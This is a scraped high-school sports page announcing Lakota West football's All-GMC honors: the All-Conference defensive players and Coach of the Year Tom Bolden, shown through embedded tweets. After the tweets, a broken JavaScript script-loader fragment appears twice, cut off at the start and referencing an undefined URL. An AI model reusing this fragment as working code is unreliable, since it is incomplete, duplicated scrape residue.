Football
LW Football Coach/Players named to All-GMC Honors!
Congratulations to Head Coach Tom Bolden and the following football players named to the All-Conference list: #WestPride
Congratulations to our players who were voted All-Conference.
1st Team Defense:@Adenmiller13 @AlexAfari8 @aneeshvyas93 @AndreProffitt @jyairebrown13 @bhendo_ @kameron_vargas @KuwatchJackson2nd Team Defense:@SiWalters21 @Barber_web87 @Kweisi_jones8
— LakotaWestFootball (@LakotaWestFB) November 6, 2020
Congratulations to the @gmcsports Coach if the Year:@CoachTomBolden
Tom Bolden
— LakotaWestFootball (@LakotaWestFB) November 6, 2020
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();